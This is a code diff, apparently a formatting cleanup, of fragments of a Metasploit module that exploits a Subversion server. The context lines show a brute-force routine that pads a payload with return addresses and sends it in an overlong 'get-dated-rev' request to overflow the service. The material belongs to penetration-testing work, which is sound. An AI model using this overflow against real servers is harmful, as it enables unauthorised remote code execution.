@@ -33,11 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'Space' => 500,
           'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
-          'MinNops' => 16,
+          'MinNops' => 16
         },
         'SaveRegisters' => [ 'esp' ],
         'Arch' => 'x86',
-        'Platform' => %w{bsd linux},
         'Targets' => [
           [
             'Linux Bruteforce',
@@ -77,15 +76,15 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(3690),
-        OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])
+        OptString.new('URL', [ true, 'SVN URL (ie svn://host/repos)', 'svn://host/svn/repos' ])
       ]
     )
 
     register_advanced_options(
       [
         # 62 on spoonm's, 88 on HD's
-        OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),
-        OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])
+        OptInt.new('RetLength', [ false, 'Length of rets after payload', 100 ]),
+        OptBool.new('IgnoreErrors', [ false, 'Ignore errors', false ])
       ]
     )
   end
@@ -93,29 +92,29 @@ class MetasploitModule < Msf::Exploit::Remote
   def brute_exploit(addresses)
     connect
 
-    print_status("Trying #{"%.8x" % addresses['Ret']}...")
+    print_status("Trying #{'%.8x' % addresses['Ret']}...")
 
     buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded
 
     [
-      "( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",
-      "( ANONYMOUS ( 0; ) )",
-      "( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "
-    ].each_with_index { |buf, index|
+      '( 2 ( edit-pipeline ) ' + lengther(datastore['URL']) + ' ) ',
+      '( ANONYMOUS ( 0; ) )',
+      '( get-dated-rev ( ' + lengther(buffer + ' 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)') + ' ) ) '
+    ].each_with_index do |buf, index|
       trash = sock.get_once
 
       print_line("Received: #{trash}") if debugging?
 
       if (sock.put(buf) || 0) == 0 and index < 3
-        print_error("Error transmitting buffer.")
-        fail_with(Failure::Unknown, "Failed to transmit data") if !datastore['IgnoreErrors']
+        print_error('Error transmitting buffer.')
+        fail_with(Failure::Unknown, 'Failed to transmit data') if !datastore['IgnoreErrors']
       end
 
       if index == 3 and trash.length > 0
         print_error("Received data when we shouldn't have")
         fail_with(Failure::Unknown, "Received data when it wasn't expected") if !datastore['IgnoreErrors']
       end
-    }
+    end
 
     handler
     disconnect
